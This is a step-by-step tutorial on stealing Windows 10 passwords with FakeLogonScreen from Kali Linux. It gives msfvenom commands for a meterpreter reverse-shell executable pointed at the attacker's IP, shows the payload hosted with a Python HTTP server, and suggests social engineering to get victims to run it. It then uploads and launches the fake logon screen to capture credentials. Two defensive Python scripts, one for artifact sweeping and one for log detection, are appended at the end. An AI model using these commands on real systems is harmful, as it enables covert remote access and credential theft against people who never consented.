How to hack Windows 10 password using FakeLogonScreen in Kali Linux

Mutt

This article showcases a detailed guide on how to hack Windows 10 passwords using FakeLogonScreen.

I will be using FakeLogonScreen and Kali Linux to crack Windows 10 passwords. FakeLogonScreen is a handy and stealthy tool that creates a fake logon screen on a target Windows 10 machine. This tool forces the target user to enter the correct credentials and, once received, passes them on to the attacker.

Arris Huijgen developed this tool. It takes advantage of normal Windows behavior: the system displays a logon screen when it wakes up from sleep and prompts for credentials. The tool phishes the target's Windows credentials, and its strength is that it accepts only valid credentials.

Steps to Crack Windows 10 Password
Now let's try this tool and execute the exploit. We need to deploy two virtual machines i.e. Kali Linux and Windows 10. In my virtual lab environment Kali (attack machine) has IP: 192.168.0.103 and Windows (target machine) got 192.168.0.100.

Download FakeLogonScreen in Kali Linux
First, we need to download the FakeLogonScreen executable file on our attacking machine from the link:

Now, suppose the target computer is connected to the same network as the attacking computer.

Generating a Malicious Windows Hacking Payload
We will create a malicious payload using the msfvenom tool according to the information received by the target system. We will set up lhost to the IP of our Kali, which is 192.168.0.103, and set the lport to 4444. Since we are interested in using a Windows system, we will generate the payload as an executable file so that we can easily execute it on the target machine. Use the command:
Code:
# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f exe >> payload.exe

Here 'payload.exe' is the name of the generated payload. We will then run a Python one-liner to create an HTTP server that will host this malicious payload on port 80 of the attacking machine.
Code:
# python -m SimpleHTTPServer 80

Load the payload on the target machine
Everything is ready now. The most important stage comes next: getting the target to download this malicious payload. In real-life scenarios, an attacker could use various social engineering techniques to get the targeted user to download this malicious file to their system.

For a practical demonstration, we will access the directory of our Kali machine from a Windows machine and load the payload.

This will also show the current logs in our Kali machine.

Launch Metasploit to use
Let's go straight back to Kali and launch the Metasploit-framework.

Use a module multi/handler.

Set the payload to windows/meterpreter/reverse_tcp.

Set lhost as our IP i.e. 192.168.0.103 and lport as 4444

After configuring all of this, simply run the exploit, go back to your Windows computer and run the executable, that is, "payload.exe". This will quickly give us a Meterpreter session.

Upload the executable file
Now upload the FakeLogonScreen executable that we downloaded earlier to the target. Make sure you provide the correct path to the executable file.

> upload /root/Downloads/FakeLogonScreen.exe

After that, access the shell and run FakeLogonScreen.exe.

And BOOM! On the target computer, all running windows are closed and a logon screen appears asking for credentials, looking like a legitimate one. The user does not hesitate for a second to enter their credentials to get back to their work.

To test the reliability of this tool, we will enter the wrong password.

And it will show the error "Password is incorrect, please try again." This is the power of the FakeLogonScreen tool, which forces the target to enter their correct password. The user has no choice but to enter their password.

Let's enter the correct password, and the normal desktop returns as if nothing had happened.

It also shows that FakeLogonScreen works similarly to a keylogger. An attacker can easily monitor all logs and can obtain the correct password of the target user.

Some useful information
This tool can also work effectively on multiple desktop systems. When launched on different desktops, all affected screens turn black immediately after the exploit is executed from the attacking machine. This works even if the target user has set a customized background.

The exploit zip file also contains another executable file named "FakeLogonScreenToFile.exe", which works the same as the previous executable file. However, it has an additional feature: it not only shows the password but also saves it to the file %LOCALAPPDATA%\Microsoft\user.db.

This tool can also be integrated with Cobalt Strike for efficient performance.
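
For incident responders, the `%LOCALAPPDATA%\Microsoft\user.db` file mentioned above is a host artifact worth sweeping for. The following is an added example, not part of the original post or of the FakeLogonScreen project: it checks every user profile under a given root for that file and reports size and modification time. The `is_sqlite` field is an added triage hint based on an assumption, since the page does not describe the file's format.

```python
import os
from datetime import datetime, timezone

# Path from the page, relative to a profile: %LOCALAPPDATA%\Microsoft\user.db
ARTIFACT = os.path.join("AppData", "Local", "Microsoft", "user.db")
SQLITE_MAGIC = b"SQLite format 3\x00"  # header of a genuine SQLite file


def sweep_profiles(profiles_root):
    """Return one finding per user profile that holds the artifact file."""
    findings = []
    try:
        profiles = sorted(os.scandir(profiles_root), key=lambda e: e.name)
    except OSError:
        return findings  # root missing or unreadable
    for entry in profiles:
        if not entry.is_dir():
            continue
        path = os.path.join(entry.path, ARTIFACT)
        finding = {"profile": entry.name, "path": path}
        try:
            st = os.stat(path)
            with open(path, "rb") as fh:
                head = fh.read(len(SQLITE_MAGIC))
        except FileNotFoundError:
            continue  # clean profile
        except OSError as exc:
            # Present but unreadable: still report it for manual review.
            finding["error"] = type(exc).__name__
            findings.append(finding)
            continue
        finding["size"] = st.st_size
        finding["modified_utc"] = datetime.fromtimestamp(
            st.st_mtime, timezone.utc).isoformat()
        # Assumption: a ".db" file without the SQLite header deserves a look.
        finding["is_sqlite"] = head == SQLITE_MAGIC
        findings.append(finding)
    return findings


if __name__ == "__main__":
    users = os.path.join(os.environ.get("SystemDrive", "C:") + os.sep, "Users")
    for item in sweep_profiles(users):
        print(item)
```

Any hit means credentials typed on that account should be treated as exposed and rotated.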
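
The payload staging step described above (an executable served from Python's built-in HTTP server) leaves a recognizable trace in HTTP logs, because that server identifies itself with a `Server: SimpleHTTP/...` header. The following is an added detection example, not part of the original post: the log records are constructed samples and their JSON field names are assumptions standing in for whatever a proxy or network sensor actually emits.

```python
import json

EXECUTABLE_EXTS = (".exe", ".dll", ".scr", ".msi")

# Constructed sample HTTP log records (JSON lines); field names are assumptions.
SAMPLE_LOG = """\
{"ts":"2024-01-01T10:00:01Z","client":"192.168.0.100","server":"192.168.0.103","port":80,"uri":"/payload.exe","status":200,"server_header":"SimpleHTTP/0.6 Python/2.7.18"}
{"ts":"2024-01-01T10:00:05Z","client":"192.168.0.100","server":"192.168.0.103","port":80,"uri":"/","status":200,"server_header":"SimpleHTTP/0.6 Python/2.7.18"}
{"ts":"2024-01-01T10:02:00Z","client":"192.168.0.100","server":"198.18.0.10","port":443,"uri":"/setup.exe","status":200,"server_header":"nginx"}
{"ts":"2024-01-01T10:03:00Z","client":"192.168.0.100","server":"192.168.0.50","port":80,"uri":"/tools/agent.exe","status":404,"server_header":"SimpleHTTP/0.6 Python/3.11.2"}
not-json
"""


def find_staged_downloads(log_text):
    """Flag successful executable downloads served by Python's ad-hoc server."""
    hits = []
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
            uri_path = rec["uri"].split("?", 1)[0].lower()
            status = int(rec["status"])
            header = str(rec.get("server_header", ""))
            endpoint = "%s:%d" % (rec["server"], int(rec["port"]))
            client = rec["client"]
        except (ValueError, KeyError, TypeError, AttributeError):
            continue  # skip malformed or incomplete records
        served_by_simplehttp = header.startswith("SimpleHTTP/")
        is_executable = uri_path.endswith(EXECUTABLE_EXTS)
        if served_by_simplehttp and is_executable and 200 <= status < 300:
            hits.append((client, endpoint, rec["uri"]))
    return hits


if __name__ == "__main__":
    for client, endpoint, uri in find_staged_downloads(SAMPLE_LOG):
        print("ALERT: %s fetched %s from %s" % (client, uri, endpoint))
```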